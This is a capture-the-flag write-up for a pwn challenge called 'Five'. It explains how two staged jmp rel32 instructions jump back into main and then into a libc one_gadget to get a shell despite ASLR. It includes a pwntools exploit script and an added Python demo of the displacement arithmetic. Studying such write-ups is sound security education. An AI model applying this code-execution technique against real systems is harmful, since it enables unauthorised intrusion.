Five

Challenge

Two staged 5-byte relative jumps (`jmp rel32`, opcode E9) are sent as the "shellcode": the first jumps back into main so the program reads another payload, and the second jumps from the new buffer into a one_gadget in libc. Because each jump is relative, only the distance between the shellcode buffer and its target matters, not the randomized absolute addresses.

Solution

Key solve code:

from pwn import *

elf = ELF("./five")  # binary path assumed; not given in the original writeup
main = elf.sym["main"]
p = remote("localhost", 1337)

# Distance from the second shellcode buffer to the libc base, and the
# one_gadget offset inside libc (both found during the solve).
page_offset = -0x1c3000
og = 0x4497f

# Stage 1: jmp rel32 back to main. rel32 is taken from the end of the 5-byte
# instruction, hence the -5. The offsets imply the first buffer is page-aligned
# and sits 0x10000 above main's page, so only main's low 12 bits are needed.
s = b"\xe9" + p32(-0x10000 + (main & 0xfff) - 5, signed=True)
p.send(s)

# Stage 2: main runs again and reads into the next buffer; jump from there
# into the libc one_gadget.
s2 = b"\xe9" + p32(page_offset + og - 5, signed=True)
p.send(s2)
p.interactive()
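The following is an added example, not part of the original writeup, showing how the two rel32 values above are derived and why they survive ASLR. It encodes and decodes `jmp rel32`, rebuilds both stages from a layout that is assumed for illustration (PIE base, libc base, main at offset 0x1a9 within its page, buffer page 0x10000 above main's page, libc base 0x1c3000 below the second buffer; the one_gadget offset 0x4497f is from the writeup), and checks that shifting the bases leaves the payload bytes unchanged. It uses only the standard library, so pwntools is not required.

```python
import struct

JMP_REL32_LEN = 5  # E9 + 4-byte signed displacement
MASK64 = (1 << 64) - 1


def reachable(src, dst):
    """True if dst is within rel32 range of a jmp executed at src."""
    rel = dst - (src + JMP_REL32_LEN)
    return -0x80000000 <= rel <= 0x7FFFFFFF


def encode_jmp_rel32(src, dst):
    """Return the 5-byte `jmp rel32` that, executed at address src, lands on dst.
    The displacement is relative to the end of the instruction (src + 5)."""
    if not reachable(src, dst):
        raise ValueError(f"{dst:#x} is not reachable from {src:#x} with rel32")
    rel = dst - (src + JMP_REL32_LEN)
    return b"\xe9" + struct.pack("<i", rel)


def decode_jmp_rel32(code, src):
    """Inverse of encode_jmp_rel32: the target of a jmp rel32 located at src."""
    if len(code) != JMP_REL32_LEN or code[0] != 0xE9:
        raise ValueError("not a jmp rel32")
    (rel,) = struct.unpack("<i", code[1:])
    return (src + JMP_REL32_LEN + rel) & MASK64


def build_stages(main, buf1, libc_base, buf2, one_gadget_off=0x4497F):
    """Two-stage chain as in the writeup: stage 1 jumps from the first shellcode
    buffer back to main (so the program reads again), stage 2 jumps from the
    second buffer to the libc one_gadget."""
    stage1 = encode_jmp_rel32(buf1, main)
    stage2 = encode_jmp_rel32(buf2, libc_base + one_gadget_off)
    return stage1, stage2


def layout(pie_base, libc_base):
    """Hypothetical process layout for illustration: main at page offset 0x1a9
    (assumed), first buffer one 0x10000 above main's page, second buffer
    0x1c3000 above the libc base (the distances the solve script encodes)."""
    main = pie_base + 0x11A9
    buf1 = (main & ~0xFFF) + 0x10000
    buf2 = libc_base + 0x1C3000
    return main, buf1, buf2


def demo():
    """Build the chain for two different ASLR bases and report whether the
    payload bytes are identical, which is what makes the attack work blind."""
    m1, b1, c1 = layout(0x555555554000, 0x7FFFF7D8A000)
    m2, b2, c2 = layout(0x5600000000000, 0x7F1234567000)
    run1 = build_stages(m1, b1, 0x7FFFF7D8A000, c1)
    run2 = build_stages(m2, b2, 0x7F1234567000, c2)
    return {
        "stage1": run1[0],
        "stage2": run1[1],
        "aslr_independent": run1 == run2,
        # sanity: stage 1 really lands on main, stage 2 on the one_gadget
        "stage1_target_ok": decode_jmp_rel32(run1[0], b1) == m1,
        "stage2_target_ok": decode_jmp_rel32(run1[1], c1) == 0x7FFFF7D8A000 + 0x4497F,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v.hex() if isinstance(v, bytes) else v)
```

Note the range check: a rel32 can only span 2 GiB, so the chain only works because each buffer is near its target; jumping straight from a buffer near the PIE binary to libc (or vice versa) would fail, which is why two stages are needed.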

Flag

gigem{if_you_used_syscall_read_pls_tell_nhwn_how_you_did_it}